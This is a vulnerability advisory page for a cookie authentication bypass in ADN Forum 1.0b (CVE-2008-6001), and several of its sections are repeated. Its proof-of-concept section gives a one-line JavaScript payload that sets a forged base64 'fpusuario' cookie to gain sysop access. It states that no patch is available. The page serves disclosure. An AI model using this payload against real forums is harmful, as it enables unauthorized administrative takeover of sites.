ADN Forum Cookie Authentication Bypass Vulnerability
BID:31383
Info
ADN Forum Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 31383 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-6001 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 24 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | Pepelux |
| Vulnerable: |
ADN Forum ADN Forum 1.0 b |
| Not Vulnerable: | |
Discussion
ADN Forum Cookie Authentication Bypass Vulnerability
ADN Forum is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
This issue affects ADN Forum 1.0b and prior versions.
ADN Forum is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
This issue affects ADN Forum 1.0b and prior versions.
Exploit / POC
ADN Forum Cookie Authentication Bypass Vulnerability
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
the value of 'fpusuario' represents the base64-encoded form of the 'sysop:000000000000000000000000000000:sysop:0' string.
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
the value of 'fpusuario' represents the base64-encoded form of the 'sysop:000000000000000000000000000000:sysop:0' string.
Solution / Fix
ADN Forum Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ADN Forum Cookie Authentication Bypass Vulnerability
References:
References:
- ADN Forum Homepage (ADN Forum)
- adnforum <= 1.0b / Insecure Cookie Handling Vulnerability (Pepelux
)